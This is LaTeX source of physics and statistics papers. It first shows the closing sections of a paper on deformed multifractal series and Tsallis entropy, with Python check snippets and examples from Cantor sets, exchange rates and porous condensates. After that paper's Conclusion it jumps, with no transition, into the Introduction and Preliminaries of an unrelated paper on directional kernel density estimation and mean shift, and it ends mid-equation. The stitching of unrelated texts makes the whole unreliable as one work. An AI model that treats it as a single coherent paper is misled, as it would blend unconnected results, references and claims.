is easy to find an explicit relation between the first of these coefficients,
the Tsallis entropy
$S_{\lambda}=\mathcal{S}_{\lambda}^{(1)}=\ln_\lambda\left(Z_\lambda^{\frac{1}{1-\lambda}}\right)$
and the multifractal dimension
$D_{\lambda}=D_{\lambda}^{(1)}=\frac{\ln(Z_\lambda)}{(\lambda-1)\ln(\ell)}$.
The use of the relation $Z_\lambda=\ell^{\tau_\lambda}$, the connection
$\tau_\lambda=D_\lambda(\lambda-1)$, and the Tsallis exponential
$\exp_\lambda(x)=\left[1+(1-\lambda)x\right]^{\frac{1}{1-\lambda}}$ leads to
the expressions
\begin{equation}
S_\lambda=\ln_\lambda\left(W^{D_\lambda}\right),\quad
D_\lambda=\frac{\ln\left[\exp_\lambda\left(S_\lambda\right)\right]}{\ln(W)}
\label{SDSD}
\end{equation}
where the statistical weight $W=1/\ell$ is used. Unfortunately, it is
impossible to establish any closed relation between the coefficients (\ref{kernel})
and (\ref{DD}) at $n>1$. However, the use of the partition function
$Z_\lambda=W^{-D_\lambda(\lambda-1)}$ allows us to write
\begin{equation}
D_\lambda^{(n)}=\frac{\left[D_\lambda(\lambda-1)-1\right]^{(n)}}{(\lambda-1)^n},
\label{lambda}
\end{equation}
\begin{equation}
\mathcal{S}_{\lambda}^{(n)}=-\frac{\left[W^{-D_\lambda(\lambda-1)}-1\right]^{(n)}}
{(\lambda-1)^n}.
\label{entropy}
\end{equation}
Thus, knowing the first coefficients of the expansions (\ref{Z1}) and (\ref{tau}),
connected by the relations (\ref{SDSD}), one can obtain the coefficients for arbitrary
orders $n>1$.
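Both relations (\ref{SDSD}) are simple to confirm numerically; the sketch below (added for illustration) uses arbitrary probabilities and the convention $\ell=1/W$ assumed in the text.

```python
# Numerical check of the mutual relations between the Tsallis entropy
# S_lambda and the dimension D_lambda, under the convention ell = 1/W
# (the probabilities below are illustrative).
import math

p = [0.4, 0.25, 0.2, 0.15]
W = len(p)

def relations_hold(lam, tol=1e-12):
    Z = sum(pi**lam for pi in p)
    S = -(Z - 1.0) / (lam - 1.0)                          # Tsallis entropy
    D = math.log(Z) / ((lam - 1.0) * math.log(1.0 / W))   # dimension D_lambda
    # first relation: S_lambda = ln_lambda(W^D_lambda)
    ln_lam = (W**(D * (1.0 - lam)) - 1.0) / (1.0 - lam)
    # second relation: D_lambda = ln(exp_lambda(S_lambda)) / ln(W)
    exp_lam = (1.0 + (1.0 - lam) * S)**(1.0 / (1.0 - lam))
    return abs(S - ln_lam) < tol and abs(D - math.log(exp_lam) / math.log(W)) < tol

assert all(relations_hold(lam) for lam in (0.5, 2.0, 3.0))
```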
\section{Random variable distributed over a multifractal set}
Let us consider an observable $\phi_i$ distributed over a multifractal set with
the average $\left<\phi\right>_q^\lambda=\sum_i
\phi_i\mathcal{P}_i(q,\lambda)$. Related probability is determined by the
equation
\begin{equation} \label{PP}
\lambda\mathcal{P}_i(q,\lambda):=p_i+\ln(\ell)p_i\frac{\partial\tau_q^\lambda}{\partial
p_i}
\end{equation}
that generalizes eq. (\ref{P}) for the escort probability due to the $\lambda$
deformation. Taking into account eqs. (\ref{P} -- \ref{DD}), this average can be
expressed in terms of the deformed series
\begin{equation} \label{O}
\lambda\left<\phi\right>_q^\lambda=\left<\phi\right>+\sum\limits_{n=1}^\infty
\frac{\left[\lambda\left<\phi\right>_\lambda-1\right]^{(n)}}{[n]_\lambda!(\lambda-1)^{n}}
(q-1)_\lambda^{(n)}
\end{equation}
where $\left<\phi\right>=\sum_i\phi_i p_i$ and
$\left<\phi\right>_\lambda=\sum_i\phi_i P_i(\lambda)$. This equation allows one
to find the mean value $\left<\phi\right>_q^\lambda$ versus the self-similarity
degree $q$ at the $\lambda$ deformation fixed. In the case $\lambda=q$ when
definition (\ref{8}) gives $(q-1)_q^{(n)}=0$ for $n>1$, the equation (\ref{O})
arrives at the connection $\left<\phi\right>_q^q=\left<\phi\right>_q$ between
mean values related to generalized and escort probabilities given by eqs.
(\ref{PP}) and (\ref{P}), respectively. At the point $\lambda=0$ where
according to eqs. (\ref{8}, \ref{10}, \ref{limit})
$(q-1)_0^{(n)}=(q-1)q^{n-1}$, $[n]_0!=1$ and
$\left[\lambda\left<\phi\right>_\lambda-1\right]^{(n)}\to(-1)^n\left<\phi\right>$,
eq. (\ref{O}) reduces to an identity; here, one has the uniform distribution
$P_i(q,0)=1/W$ for arbitrary $p_i$, and the average is
$\left<\phi\right>_q^0=W^{-1}\sum_i \phi_i$. At $\lambda=1$, when
$\left[\left<\phi\right>_1-1\right]^{(n)}=0$, the equation (\ref{O}) yields
the ordinary average $\left<\phi\right>=\sum_i\phi_i p_i$ because the
distribution $P_i(q,1)$ reduces to $p_i$. Setting $\sum_{n=1}^\infty
(-1)^{n-1}\left<\phi\right>_{\lambda^n}\to\left<\phi\right>_\infty$ for
$\lambda\gg 1$ where
$(q-1)_\lambda^{(n)}\sim(-1)^{n-1}(q-1)\lambda^{n(n-1)/2}$,
$[n]_\lambda!\sim\lambda^{n(n-1)/2}$ and
$\left[\lambda\left<\phi\right>_\lambda-1\right]^{(n)}\sim\lambda^n\left<\phi\right>_{\lambda^n}$,
one obtains the simple dependence
$\lambda\left<\phi\right>_q^\lambda=\left<\phi\right>+(q-1)\left<\phi\right>_\infty$,
according to which the average $\left<\phi\right>_q=\left<\phi\right>_q^q$
tends to the limit $\left<\phi\right>_\infty$ with the $q$-growth.
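The truncation of the series (\ref{O}) at $\lambda=q$ can be made explicit in a small numerical sketch (the observable $\phi_i$ and probabilities $p_i$ below are illustrative): since $(q-1)_q^{(n)}=0$ for $n>1$, only the $n=1$ term survives and the deformed average reproduces the escort one, $\left<\phi\right>_q^q=\left<\phi\right>_q$.

```python
# Sketch of the deformed average: at lambda = q the deformed series
# truncates after n = 1 and reproduces the escort average <phi>_q.
phi = [1.0, 2.0, 5.0]            # illustrative observable
p = [0.5, 0.3, 0.2]              # illustrative box probabilities

def escort_average(q):
    Z = sum(pi**q for pi in p)
    return sum(f * pi**q / Z for f, pi in zip(phi, p))

def deformed_average(q, lam):
    # ordinary average <phi> and the n = 1 functional binomial
    # lam*<phi>_lam - <phi>; higher deformed binomials vanish at lam = q
    mean1 = sum(f * pi for f, pi in zip(phi, p))
    first = lam * escort_average(lam) - mean1
    return (mean1 + first * (q - 1.0) / (lam - 1.0)) / lam

for q in (0.5, 2.0, 3.0):
    assert abs(deformed_average(q, q) - escort_average(q)) < 1e-12
```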
\section{Examples}
To demonstrate the developed approach, we first consider the simplest
example of the Cantor binomial set \cite{Feder}. It is generated by
$N$-fold division of the unit segment into equal parts of elementary length
$\ell=(1/2)^N$; each of these is then associated with the binomially distributed
products $p^m(1-p)^{N-m}$, $m=0,1,\dots,N$, of the probabilities $p$ and $1-p$. In
such a case, the partition function (\ref{Z}) takes the form
$Z_q=\left[p^{q}+(1-p)^{q}\right]^N$, equal to $Z_q=\ell^{\tau_q}$ with the
mass exponent $\tau_q=\frac{\ln\left[p^{q}+(1-p)^{q}\right]}{\ln(1/2)}$
\cite{Feder}. Related dependencies of the fractal dimension coefficients
(\ref{lambda}) on the deformation parameter are depicted in Figure
\ref{Dimensions} for different orders $n$ and probabilities $p$.
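The mass exponent of this set is simple enough that the limits quoted in the preceding sections can be checked directly; the sketch below (an added numerical illustration for $p=0.2$) evaluates $\tau_q$ and the coefficients (\ref{lambda}) through the functional binomial.

```python
# Sketch for the Cantor binomial set: mass exponent
# tau(q) = ln(p^q + (1-p)^q)/ln(1/2) and the dimension coefficients built
# from the functional binomial (illustrative probability p = 0.2).
import math
from math import comb

p = 0.2

def tau(q):
    return math.log(p**q + (1.0 - p)**q) / math.log(0.5)

def D_coeff(n, lam):
    num = sum(comb(n, m) * tau(lam**m) * (-1.0)**(n - m) for m in range(n + 1))
    return num / (lam - 1.0)**n

# support dimension and normalization: tau_0 = -1, tau_1 = 0
assert abs(tau(0.0) + 1.0) < 1e-12 and abs(tau(1.0)) < 1e-12
# n = 1 reduces to the ordinary spectrum D_lambda = tau_lambda/(lambda - 1)
assert abs(D_coeff(1, 2.0) - tau(2.0) / 1.0) < 1e-12
# extreme dimensions ln(p_max)/ln(1/2) and ln(p_min)/ln(1/2) are approached
# at large |lambda| (within a few per cent already at |lambda| = 100)
D_min = math.log(0.8) / math.log(0.5)        # ~ 0.32
D_max = math.log(0.2) / math.log(0.5)        # ~ 2.32
assert abs(D_coeff(1, 100.0) - D_min) < 5e-2
assert abs(D_coeff(1, -100.0) - D_max) < 5e-2
```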
\begin{figure}[!h]
\centering
\includegraphics[width=70mm]{p02.pdf}\\
\includegraphics[width=70mm]{n2.pdf}
\caption{Fractal dimension coefficients (\ref{lambda}) versus deformation
of the Cantor binomial set at $p=0.2$ (a) and $n=2$ (b)
(curves 1 -- 4 correspond to $n=1, 2, 3, 4$ on the upper panel and $p=0.1, 0.2, 0.3, 0.4$
on the lower one).}
\label{Dimensions}
\end{figure}
As the upper panel shows, at given $p$ the monotonic decay of the fractal
dimension $D_\lambda^{(n)}$, usual at $n=1$, transforms into
non-monotonic dependencies, whose oscillations become stronger as the
order $n$ grows. According to the lower panel, such behavior persists under
variation of the probability $p$, whose growth narrows the dimension spectrum.
In contrast to the fractal dimensions (\ref{lambda}), the entropy coefficients
(\ref{entropy}) depend on the effective number of particles $N$. This
dependence is demonstrated by the example of the Tsallis entropy
$S_{\lambda}=\mathcal{S}_{\lambda}^{(1)}$ depicted in Figure \ref{Entropies}a:
with growing deformation, this entropy decays
\begin{figure}[!h]
\centering
\includegraphics[width=70mm]{Sn1.pdf}\\
\includegraphics[width=70mm]{Sn.pdf}
\caption{Effective entropies (\ref{entropy})
of the Cantor binomial set at $p=0.2$ and:
a) $n=1$ (curves 1 -- 4 correspond to $N=1,4,8,12$);
b) $N=10$ (curves 1 -- 4 correspond to $n=1, 2, 3, 4$).}
\label{Entropies}
\end{figure}
the faster the more $N$ is (by this, the specific value $S_{\lambda}/N$ remains
constant at $\lambda=1$). According to Figure \ref{Entropies}b, with increase
of the order $n$, the monotonically decaying dependence
$\mathcal{S}_{\lambda}^{(1)}$ transforms into the non-monotonic one,
$\mathcal{S}_{\lambda}^{(n)}$, whose oscillations grow with $n$.
Characteristically, for arbitrary values $n$ and $p$, the magnitude
$\mathcal{S}_0^{(n)}$ (being equal $2^N$ for the Cantor binomial set) remains
constant.
As the second example we consider the time series of the euro-to-US-dollar
exchange rate over the years 2007 -- 2009, which include the
financial crisis (the data are taken from the website www.fxeuroclub.ru). To ascertain
the effect of the crisis we study the time series intervals before it (January 2007 --
May 2008) and after it (June 2008 -- October 2009).\footnote{The point
of the crisis is fixed by the condition of maximal value of the time series~dispersion.}
Moreover, we restrict ourselves to consideration of the
coefficients (\ref{lambda}) and (\ref{entropy}) of the lowest orders $n$, which
suffice to visualize the difference between the fractal characteristics of
the time series intervals pointed out. Along this way, we rely on the method of
multifractal detrended fluctuation analysis \cite{Kantel} to find the mass
exponent $\tau(q)$, whose use yields the dependencies depicted in Figure
\ref{currency}.
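For completeness, the fluctuation-analysis step can be sketched as follows. This is a minimal pure-Python version of the MFDFA procedure of \cite{Kantel} with linear detrending only; the sample size, scale range, and tolerance below are illustrative assumptions, not the settings used for the currency data.

```python
import math, random

def _linfit(xs, ys):
    # ordinary least-squares line fit; returns (slope, intercept)
    n = len(xs)
    mx, my = sum(xs) / n, sum(ys) / n
    sxx = sum((u - mx) ** 2 for u in xs)
    sxy = sum((u - mx) * (w - my) for u, w in zip(xs, ys))
    slope = sxy / sxx
    return slope, my - slope * mx

def mfdfa_hq(series, scales, q):
    # generalized Hurst exponent h(q) for q != 0; the mass exponent then
    # follows as tau(q) = q * h(q) - 1.  Linear detrending; the trailing
    # remainder of the series at each scale is simply discarded
    # (a simplification of the full procedure of Kantelhardt et al.).
    mean = sum(series) / len(series)
    profile, acc = [], 0.0
    for value in series:
        acc += value - mean
        profile.append(acc)                 # profile = cumulative sum
    log_s, log_F = [], []
    for s in scales:
        n_seg = len(profile) // s
        ts = list(range(s))
        fluct = []
        for k in range(n_seg):
            seg = profile[k * s:(k + 1) * s]
            slope, icept = _linfit(ts, seg)
            f2 = sum((y - (icept + slope * t)) ** 2
                     for t, y in zip(ts, seg)) / s
            fluct.append(f2)                # detrended variance per segment
        Fq = (sum(f ** (q / 2.0) for f in fluct) / n_seg) ** (1.0 / q)
        log_s.append(math.log(s))
        log_F.append(math.log(Fq))
    return _linfit(log_s, log_F)[0]         # slope of log F_q vs. log s

random.seed(7)
noise = [random.gauss(0.0, 1.0) for _ in range(2048)]
h2 = mfdfa_hq(noise, scales=[16, 32, 64, 128], q=2.0)
assert 0.3 < h2 < 0.7       # white noise: h(2) should be close to 1/2
```

The sanity check exploits the fact that for uncorrelated noise $h(2)\approx 1/2$, i.e., $\tau(2)\approx 0$.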
\begin{figure}[!h]
\centering
\includegraphics[width=70mm]{D1currency.pdf}\\
\includegraphics[width=70mm]{S1currency.pdf}\\
\includegraphics[width=70mm]{S2currency.pdf}
\caption{a) Fractal dimension coefficients (\ref{lambda})
at $n=1$ for the time series of the euro-to-US-dollar
exchange rate; related entropy coefficients (\ref{entropy})
at $n=1$ (b) and $n=2$ (c) (bold dots correspond to the
time interval before the financial crisis, circles -- after it).}
\label{currency}
\end{figure}
Comparison of the data taken before and after the financial crisis shows that the
crisis already affects the fractal dimension coefficient of the lowest order $n=1$,
but has no effect on the Tsallis entropy related to $n=1$, while the
entropy coefficient of the second order, $n=2$, turns out to be strongly sensitive
to the crisis. Thus, this example demonstrates visually that the generalized
multifractal characteristics elaborated on the basis of the developed formalism
allow one to study subtle details of self-similarly evolving processes.
The last example concerns the macrostructure of condensates which have
been obtained as a result of sputtering substances in accumulative ion-plasma
devices \cite{Perekr}. The peculiarity of such a process is that it has
allowed one to obtain porous condensates of the type shown in
Figures \ref{surface}a and \ref{surface}b for carbon and titanium,
respectively.
\begin{figure}[!h]
\centering
a\hspace{5.5cm}b\\
\vspace{0.2cm}
\includegraphics[width=120mm]{CTi.pdf}\\
\vspace{0.2cm}
c\hspace{5.5cm}d\\
\includegraphics[width=60mm]{D1surface.pdf}\includegraphics[width=60mm]{S1surface.pdf}
\caption{Scanning electron microscopy images of {\it ex-situ} grown carbon (a)
and titanium (b) condensates; corresponding fractal dimensions (c) and entropies (d)
at $n=1$ (curves 1, 2 relate to carbon and titanium).}
\label{surface}
\end{figure}
These condensates are seen to have an apparent fractal macrostructure, whose
processing gives the fractal dimension spectra and the entropies depicted in
Figures \ref{surface}c and \ref{surface}d, respectively. Comparing these
dependencies, we see that the difference between the carbon condensate,
which has a strongly rugged surface, and the titanium one becomes apparent
already with the use of the fractal dimension and entropy coefficients
(\ref{lambda}), (\ref{entropy}) related to the lowest order $n=1$. Thus, in the
case of multifractal objects with strongly different structures the use of
the usual multifractal characteristics appears to be sufficient.
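A generic box-counting sketch of the kind used in such image handling (not the exact procedure behind Figures \ref{surface}c and \ref{surface}d; the helper name and grid sizes are ours) reads:

```python
import math

def box_counting_dimension(pixels, box_sizes):
    # pixels: set of (row, col) occupied sites on a square grid;
    # each b in box_sizes should divide the grid side length
    logs, logN = [], []
    for b in box_sizes:
        boxes = {(r // b, c // b) for r, c in pixels}   # occupied b x b boxes
        logs.append(math.log(1.0 / b))
        logN.append(math.log(len(boxes)))
    # least-squares slope of log N(b) versus log(1/b)
    n = len(logs)
    mx, my = sum(logs) / n, sum(logN) / n
    sxx = sum((x - mx) ** 2 for x in logs)
    sxy = sum((x - mx) * (y - my) for x, y in zip(logs, logN))
    return sxy / sxx

# sanity checks: a filled square is 2-dimensional, a straight line 1-dimensional
size = 64
full = {(r, c) for r in range(size) for c in range(size)}
line = {(0, c) for c in range(size)}
assert abs(box_counting_dimension(full, [1, 2, 4, 8]) - 2.0) < 1e-9
assert abs(box_counting_dimension(line, [1, 2, 4, 8]) - 1.0) < 1e-9
```

On a self-similar pixel set such as a finite-generation Sierpinski carpet, the same slope recovers the expected non-integer dimension $\ln 8/\ln 3$.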
\section{Conclusion}
Generalizing the multifractal theory \cite{multi}, we have represented the
partition function (\ref{Z1}), the mass exponent (\ref{tau}), and the average
$\left<\phi\right>_q^\lambda$ of a self-similarly distributed random variable as
deformed series in powers of the difference $q-1$. The coefficients of these
expansions are shown to be determined by the functional binomial (\ref{binomial}),
which expresses both the multifractal dimension spectra (\ref{lambda}) and the
generalized Tsallis entropies (\ref{entropy}) related to manifold deformations. We have
found eq. (\ref{O}) for the average related to the generalized probability
(\ref{PP}) subject to the deformation. Recently, the use of the above formalism
has allowed us to develop a field theory for self-similar statistical systems
\cite{OSh}.
As examples of multifractal sets in mathematical physics, objects of
solid state physics, and processes in econophysics, we have applied the
developed formalism to the consideration of Cantor manifolds, porous surface
condensates, and currency exchange series, respectively. The study of the
Cantor set has shown that both the fractal dimension coefficients (\ref{lambda})
and the entropies (\ref{entropy}) coincide with the usual multifractal characteristics
in the lowest order $n=1$, but display very complicated behaviour at $n>1$. On
the contrary, consideration of both carbon and titanium surface condensates has
shown that their macrostructures can be characterized by the use of the usual fractal
dimension and entropy coefficients related to the order $n=1$. A much more
complicated situation takes place in the case of time series such as the
currency exchange series. Here, a difference between the various series is
displayed by the fractal dimension coefficients already in the lowest order
$n=1$, whereas the entropy coefficients coincide at $n=1$ but become different at
$n=2$. This example demonstrates the need to use the generalized multifractal
characteristics obtained within the framework of the developed formalism.
\section{Introduction}
\label{Sec:Intro}
A directional data set (or simply directional data) is the collection of observations on a (hyper)sphere.
It occurs in many scientific problems when measurements are taken on the surface of a spherical object, such as Earth or other planets.
For instance, the locations of earthquakes are often represented by their longitudes and latitudes
\citep{taylor2009active, craig2011earthquake};
thus, the locations can be viewed as random variables on a two-dimensional (2D) sphere.
In astronomical surveys,
the locations of galaxies are usually recorded by their angular positions (right ascensions and declinations) in the sky, leading
to observations on a 2D sphere \citep{york2000sloan,skrutskie2006two, abbott2016dark}.
In planetary science, observations often comprise locations on a planet, such as Mars,
and can also be considered as random variables on a 2D sphere \citep{Lakes_On_Mars,BARLOW2015,Unif_test_hypersphere2020}.
These observations on a sphere can be regarded as independently and identically distributed random variables from a density function supported on the sphere (called a directional density function).
The local modes of a density function are often of research interest because they signal high density areas \citep{scott2012multivariate}
and can be used to cluster data \citep{MS_Density_ridge2018,chacon2020modal}.
However, identifying the local modes of a directional density function is a nontrivial task that involves both statistical and computational challenges.
From a statistical perspective, it is necessary to obtain an accurate estimator of the underlying directional density (as well as its derivatives). From a computational perspective, one needs to design an algorithm to efficiently compute the local modes of the density estimator.
To address the aforementioned challenges, we consider the idea of kernel smoothing because the kernel density estimator (KDE; \citealt{Rosenblatt1956, Parzen1962}) in the Euclidean data setting is highly successful. Its statistical properties have been well-studied \citep{All_nonpara2006,Scott2015,KDE_t}, and the local modes of a Euclidean KDE are often good estimators of the local modes of the underlying density function \citep{Parzen1962, Romano1988, vieu1996note,Mode_clu2016}.
Moreover, in Euclidean KDEs, there is an elegant algorithm known as the \emph{mean shift} algorithm
\citep{MS1975,MS1995,MS2002,carreira2015review}
that allows us to numerically obtain the local modes at a low cost.
\begin{figure}
\centering
\includegraphics[width=0.9\linewidth]{Figures/MS_TripMode_MC_affi.pdf}
\caption{Clustering of directional data using the proposed directional mean shift algorithm (Algorithm~\ref{Algo:MS}). Additional details of the simulated data can be found in Section~\ref{sec:spherical}.}
\label{fig:Mode_clu_Example}
\end{figure}
Although kernel smoothing has been applied to directional data since the seminal work of \cite{KDE_Sphe1987}
and other studies have been conducted on analyzing its performance as a density estimator \citep{KDE_direct1988, Zhao2001,Exact_Risk_bw2013, ley2018applied},
little is known about the behavior of the derivatives of a directional KDE. To the best of our knowledge,
\cite{KLEMELA2000} was the only work to examine the derivatives of a particular type of directional KDE; however, their estimators are rarely used in practice.
Thus, the statistical properties of the gradient system induced by a general directional KDE and the resulting local modes are still open problems.
Computationally, the standard mean shift algorithm was first generalized to directional data setting by \cite{Multi_Clu_Gene2005}. Using the directional mean shift algorithm, we are able to determine the local modes of the directional KDE and perform mode clustering (mean shift clustering) of spherical data. Figure~\ref{fig:Mode_clu_Example} presents an example of mode clustering with our proposed algorithm. However, the algorithmic rate of convergence of the mean shift algorithm with directional data remains unclear. We address this problem by viewing the directional mean shift algorithm as a special case of gradient ascent methods on the $q$-dimensional unit sphere $\Omega_q = \big\{\bm{x} \in \mathbb{R}^{q+1}: \norm{\bm{x}}_2^2 = x_1^2+ \cdots + x_{q+1}^2=1 \big\}$ and develop some linear convergence results for the general gradient ascent method on $\Omega_q$.
\textbf{\emph{Notation}.} Bold-faced variables (e.g., $\bm{x}, \bm{\mu}$) represent vectors, while capitalized (bold-faced) variables (e.g., $\bm{X}_1,...,\bm{X}_n$) denote random variables (or random vectors). The set of real numbers is denoted by $\mathbb{R}$, while the unit $q$-dimensional sphere embedded in $\mathbb{R}^{q+1}$ is denoted by $\Omega_q$. The norm $\norm{\cdot}_2$ is the usual Euclidean norm (or so-called $L_2$-norm) in $\mathbb{R}^d$ for some positive integer $d$. The directional density is denoted by $f$ unless otherwise specified, and the probability of a set of events is denoted by $\mathbb{P}$. If a random vector $\bm{X}$ is distributed as $f(\cdot)$, the expectations of functions of $\bm{X}$ are denoted by $\mathbb{E}_f$ or $\mathbb{E}$ when the underlying distribution function is clear. We use the big-O notation $h(x)=O(g(x))$ if the absolute value of $h(x)$ is upper bounded by a positive constant multiple of $g(x)$ for all sufficiently large $x$. In contrast, $h(x)=o(g(x))$ when $\lim_{x\to\infty} \frac{|h(x)|}{g(x)}=0$. For random vectors, the notation $o_P(1)$ is short for a sequence of random vectors that converges to zero in probability. The expression $O_P(1)$ denotes a sequence that is bounded in probability. Additional details of stochastic $o$ and $O$ symbols can be found in Section 2.2 of \cite{VDV1998}.
The notation $a_n \asymp b_n$ indicates that $\frac{a_n}{b_n}$ has lower and upper bounds away from zero and infinity, respectively.
\textbf{\emph{Main results}.}
\begin{enumerate}
\item We revisit the mean shift algorithm with directional data (Algorithm~\ref{Algo:MS}) and provide some new insights on its iterative formula, which can be expressed in terms of the total gradient of the directional KDE (Sections~\ref{Sec:MS_Dir} and \ref{Sec:grad_Hess_Dir}).
\item From the perspective of statistical learning theory, we establish uniform convergence rates of the gradient and Hessian of the directional KDE (Theorem~\ref{pw_conv_tang} and \ref{unif_conv_tang}).
\item Moreover, we derive the asymptotic properties of estimated local modes around the true (population) local modes (Theorem~\ref{Mode_cons}).
\item With regard to computational learning theory, we prove the ascending and converging properties of the directional mean shift algorithm (Theorems~\ref{MS_asc} and \ref{MS_conv}).
\item In addition, we prove that the directional mean shift algorithm converges linearly to an estimated local mode under suitable initialization (Theorem~\ref{Linear_Conv_GA}).
\item We demonstrate the applicability of the directional mean shift algorithm by using it as a clustering method on both simulated and real-world data sets (Section~\ref{Sec:Experiments}).
\end{enumerate}
\textbf{\emph{Related work}.}
The directional KDE has a long history in statistics since the work of \cite{KDE_Sphe1987}. Its statistical convergence rates and asymptotic distributions have been studied by \cite{KDE_direct1988, Zhao2001}.
In addition, \cite{KDE_Sphe1987,KDE_direct1988,Exact_Risk_bw2013,Dir_Linear2013} considered the problem of selecting the smoothing bandwidth of directional KDEs.
A study by \cite{KLEMELA2000} was the first to estimate the derivatives of a directional density.
More generally, \cite{hendriks1990,pelletier2005,berry2017} considered the nonparametric density estimation on (Riemannian) manifolds (with boundary). The uniform convergence rate and asymptotic results of the KDE on Riemannian manifolds have also been investigated in \cite{henry2009,jiang2017,kim2019uniform}. As the unit hypersphere $\Omega_q$ is a $q$-dimensional manifold with constant curvature and positive reach \citep{federer1959}, their analyses and results are applicable to the directional KDE.
The standard mean shift algorithm with Euclidean data is a popular approach to various tasks such as clustering \citep{MS1975}, image segmentation \citep{MS2002}, and object tracking \citep{Kernel_Based_Ob2003}; see a comprehensive review in \cite{carreira2015review}. Its convergence properties have been well-studied in \cite{MS1995,MS2007_pf,MS_onedim2013,MS2015_Gaussian,Ery2016,wang2016}.
The algorithmic convergence rates of mean shift algorithms with Gaussian and Epanechnikov kernels are generally linear, except for some extreme values of the bandwidth \citep{MS_EM2007,huang2018convergence}. It can be improved to be superlinear by dynamically updating the data set for estimating the density \citep{Acc_Dy_MS2006}. There are other methods to accelerate the mean shift algorithm by combining stochastic optimization with blurring or random sampling \citep{Fast_GBMS2006,GBMS2008, Stoc_GKD_Mode_seek2009,Fast_MS2016}. The mean shift algorithm with directional data was studied by \cite{Multi_Clu_Gene2005,DMS_topology2010,vMF_MS2010,MSBC_Dir2010,MSBC_Cir2012,MSC_Dir2014} in the last two decades. More generally, \cite{tuzel2005simultaneous,subbarao2006nonlinear,Nonlinear_MS_man2009,Intrinsic_MS2009,Semi_Intrinsic_MS2012,ashizawa2017least} proposed their mean shift algorithms on manifolds using logarithmic and exponential maps, heat kernel, or direct log-density estimation via least squares. These mean shift algorithms on general manifolds are applicable to directional data, though they are more complicated than the method considered here.
\textbf{\emph{Outline}.}
The remainder of the paper is organized as follows. Section~\ref{Sec:Prelim} reviews some background knowledge on directional KDEs and differential geometry, while Section~\ref{Sec:MS_Dir} provides a detailed derivation of the mean shift algorithm with directional data.
Section \ref{Sec:grad_Hess_consist} focuses on the statistical learning theory of the directional KDE; we
formulate the gradient and Hessian estimators of directional KDEs and establish their pointwise and uniform consistency results
as well as a mode consistency theory.
Section \ref{Sec:Algo_conv} considers the computational learning theory of the directional mean shift algorithm;
we study the ascending and converging properties of the algorithm.
Simulation studies and applications to real-world data sets are unfolded in Section~\ref{Sec:Experiments}. Proofs of theorems and technical lemmas are deferred to Appendix~\ref{Appendix:proofs}. All the code for our experiments is available at \url{https://github.com/zhangyk8/DirMS}.
\section{Preliminaries}
\label{Sec:Prelim}
This section is devoted to a brief review of the directional KDE and some technical concepts of differential geometry on $\Omega_q$.
\subsection{Kernel Density Estimation with Directional Data} \label{sec::KDE}
Let $\bm{X}_1,...,\bm{X}_n \in \Omega_q\subset\mathbb{R}^{q+1}$ be a random sample generated from the underlying directional density function $f$ on $\Omega_q$ with $\int_{\Omega_q} f(\bm{x}) \, \omega_q(d\bm{x})=1$,
where $\omega_q$ is the Lebesgue measure on $\Omega_q$. A well-known fact about the surface area of $\Omega_q$ is that
\begin{equation}
\label{surf_area}
\bar{\omega}_q\equiv \omega_q\left(\Omega_q \right) = \frac{2\pi^{\frac{q+1}{2}}}{\Gamma(\frac{q+1}{2})} \quad \text{ for any integer } q\geq 1,
\end{equation}
where $\Gamma$ is the Gamma function defined as $\Gamma(z)=\int_0^{\infty} x^{z-1} e^{-x}\, dx$ for (complex) arguments $z$ with positive real part.
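As a quick numerical sanity check of \eqref{surf_area}, the formula recovers the familiar values $\bar{\omega}_1=2\pi$, $\bar{\omega}_2=4\pi$, and $\bar{\omega}_3=2\pi^2$ (the sketch below is for illustration only):

```python
import math

def sphere_surface_area(q):
    # total surface measure of the unit q-sphere embedded in R^{q+1}:
    # 2 * pi^{(q+1)/2} / Gamma((q+1)/2)
    return 2.0 * math.pi ** ((q + 1) / 2.0) / math.gamma((q + 1) / 2.0)

assert abs(sphere_surface_area(1) - 2.0 * math.pi) < 1e-12        # unit circle
assert abs(sphere_surface_area(2) - 4.0 * math.pi) < 1e-12        # ordinary sphere
assert abs(sphere_surface_area(3) - 2.0 * math.pi ** 2) < 1e-12   # 3-sphere
```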
The directional KDE at point $\bm{x}\in \Omega_q$ is often written as \citep{KDE_Sphe1987,KDE_direct1988,Exact_Risk_bw2013}:
\begin{equation}
\hat{f}_h(\bm{x}) = \frac{c_{h,q}(L)}{n} \sum_{i=1}^n L\left(\frac{1-\bm{x}^T \bm{X}_i}{h^2} \right),
\label{Dir_KDE}
\end{equation}
where $L$ is a directional kernel (a rapidly decaying function with nonnegative values and defined on $(-\delta_L,\infty) \subset \mathbb{R}$ for some constant $\delta_L >0$)\footnote{Normally, the kernel $L$ is only required to be defined on $[0,\infty)$. We extend its domain to $(-\delta_L,\infty) \subset \mathbb{R}$ so that the usual derivatives of $\hat{f}_h$ can be defined in $\mathbb{R}^{q+1}$ or at least a small neighborhood around $\Omega_q$ in $\mathbb{R}^{q+1}$ under some mild conditions on $L$. See Section~\ref{Diff_Geo_Review} and condition (D2') in Section~\ref{Sec:Consist_Assump} for details.}, $h>0$ is the bandwidth parameter, and $c_{h,q}(L)$ is a normalizing constant satisfying
\begin{equation}
\label{asym_norm_const}
c_{h,q}(L)^{-1} = \int_{\Omega_q} L\left(\frac{1-\bm{x}^T \bm{y}}{h^2} \right) \omega_q(d\bm{y}) =h^q \lambda_{h,q}(L) \asymp h^q \lambda_q(L)
\end{equation}
with $\lambda_{h,q}(L) = \bar{\omega}_{q-1} \int_0^{2h^{-2}} L(r) r^{\frac{q}{2}-1} (2-rh^2)^{\frac{q}{2}-1} dr$ and $\lambda_q(L) = 2^{\frac{q}{2}-1} \bar{\omega}_{q-1} \int_0^{\infty} L(r) r^{\frac{q}{2}-1} dr$; see (a) of Lemma~\ref{integ_lemma} in Appendix~\ref{Appendix:Thm2_pf} for details.
As in Euclidean kernel smoothing, bandwidth selection is a critical component in determining the performance of directional KDEs. There is extensive literature \citep{KDE_Sphe1987,KDE_direct1988,Auto_bw_cir2008,KDE_torus2011,Oliveira2012,Exact_Risk_bw2013,Nonp_Dir_HDR2020} that investigates various reliable bandwidth selection mechanisms. On the contrary, kernel selection is less crucial, and a popular candidate is the so-called von Mises kernel $L(r) = e^{-r}$. Its name originates from the famous $q$-von Mises-Fisher (vMF) distribution on $\Omega_q$, which is denoted by $\text{vMF}(\bm{\mu}, \nu)$ and has the density
\begin{equation}
\label{vMF_density}
